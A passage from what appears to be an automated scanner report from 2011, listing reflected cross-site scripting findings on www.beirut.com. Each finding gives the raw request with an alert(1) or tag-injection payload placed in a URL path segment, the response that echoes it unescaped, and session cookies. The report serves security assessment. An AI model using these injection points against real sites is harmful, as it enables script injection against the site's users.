var indexpage='Online-Internet/Directories231fc'-alert(1)-'973dc70caef';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.616. http://www.beirut.com/Online-Internet/Fashion-and-Shopping/8023704728 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Online-Internet/Fashion-and-Shopping/8023704728

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2b7e"><a>add34d5e1c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internetd2b7e"><a>add34d5e1c7/Fashion-and-Shopping/8023704728 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:14:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internetd2b7e"><a>add34d5e1c7">
...[SNIP]...

4.617. http://www.beirut.com/Online-Internet/Fashion-and-Shopping/8023704728 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Fashion-and-Shopping/8023704728

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3279c'-alert(1)-'cfab6d99f78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet3279c'-alert(1)-'cfab6d99f78/Fashion-and-Shopping/8023704728 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:21:56 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Online-Internet3279c'-alert(1)-'cfab6d99f78/Fashion-and-Shopping';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.618. http://www.beirut.com/Online-Internet/Fashion-and-Shopping/8023704728 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Fashion-and-Shopping/8023704728

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acba4'-alert(1)-'a9e9c40c78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet/Fashion-and-Shoppingacba4'-alert(1)-'a9e9c40c78/8023704728 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:27:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Online-Internet/Fashion-and-Shoppingacba4'-alert(1)-'a9e9c40c78';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.619. http://www.beirut.com/Online-Internet/Foreign-Exchange/5783938930 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Online-Internet/Foreign-Exchange/5783938930

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d0dd"><a>8ac9e9b9414 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internet4d0dd"><a>8ac9e9b9414/Foreign-Exchange/5783938930 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:03:09 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internet4d0dd"><a>8ac9e9b9414">
...[SNIP]...

4.620. http://www.beirut.com/Online-Internet/Foreign-Exchange/5783938930 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Foreign-Exchange/5783938930

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2476b'-alert(1)-'ec45706067d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet2476b'-alert(1)-'ec45706067d/Foreign-Exchange/5783938930 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:14:54 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Online-Internet2476b'-alert(1)-'ec45706067d/Foreign-Exchange';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.621. http://www.beirut.com/Online-Internet/Foreign-Exchange/5783938930 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Foreign-Exchange/5783938930

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b232d'-alert(1)-'48f8420c6b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet/Foreign-Exchangeb232d'-alert(1)-'48f8420c6b6/5783938930 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:18:09 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Online-Internet/Foreign-Exchangeb232d'-alert(1)-'48f8420c6b6';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.622. http://www.beirut.com/Online-Internet/Games-Entertainment/078114628 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Online-Internet/Games-Entertainment/078114628

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc761"><a>abd963421ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internetbc761"><a>abd963421ce/Games-Entertainment/078114628 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:05:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internetbc761"><a>abd963421ce">
...[SNIP]...

4.623. http://www.beirut.com/Online-Internet/Games-Entertainment/078114628 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Games-Entertainment/078114628

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d557'-alert(1)-'b81dfa7d8c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet2d557'-alert(1)-'b81dfa7d8c1/Games-Entertainment/078114628 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:18:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Online-Internet2d557'-alert(1)-'b81dfa7d8c1/Games-Entertainment';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.624. http://www.beirut.com/Online-Internet/Games-Entertainment/078114628 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Games-Entertainment/078114628

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a135b'-alert(1)-'e52a7348b3e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet/Games-Entertainmenta135b'-alert(1)-'e52a7348b3e/078114628 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:22:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Online-Internet/Games-Entertainmenta135b'-alert(1)-'e52a7348b3e';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.625. http://www.beirut.com/Online-Internet/Health-and-Wellbeing/6078086352 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Health-and-Wellbeing/6078086352

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 732b5'-alert(1)-'3ad890a46c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet732b5'-alert(1)-'3ad890a46c9/Health-and-Wellbeing/6078086352 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:18:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Online-Internet732b5'-alert(1)-'3ad890a46c9/Health-and-Wellbeing';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.626. http://www.beirut.com/Online-Internet/Health-and-Wellbeing/6078086352 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Online-Internet/Health-and-Wellbeing/6078086352

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7d48"><a>cc78e914fdc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internetc7d48"><a>cc78e914fdc/Health-and-Wellbeing/6078086352 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:09:09 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internetc7d48"><a>cc78e914fdc">
...[SNIP]...

4.627. http://www.beirut.com/Online-Internet/Health-and-Wellbeing/6078086352 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Health-and-Wellbeing/6078086352

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a9dc'-alert(1)-'ecbd8c13fe7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet/Health-and-Wellbeing9a9dc'-alert(1)-'ecbd8c13fe7/6078086352 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:24:14 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Online-Internet/Health-and-Wellbeing9a9dc'-alert(1)-'ecbd8c13fe7';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.628. http://www.beirut.com/Online-Internet/Music/4018807677 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Online-Internet/Music/4018807677

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd107"><a>97c2a516488 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internetbd107"><a>97c2a516488/Music/4018807677 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:12:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internetbd107"><a>97c2a516488">
...[SNIP]...

4.629. http://www.beirut.com/Online-Internet/Music/4018807677 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Music/4018807677

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f632'-alert(1)-'cf800f69740 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet9f632'-alert(1)-'cf800f69740/Music/4018807677 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
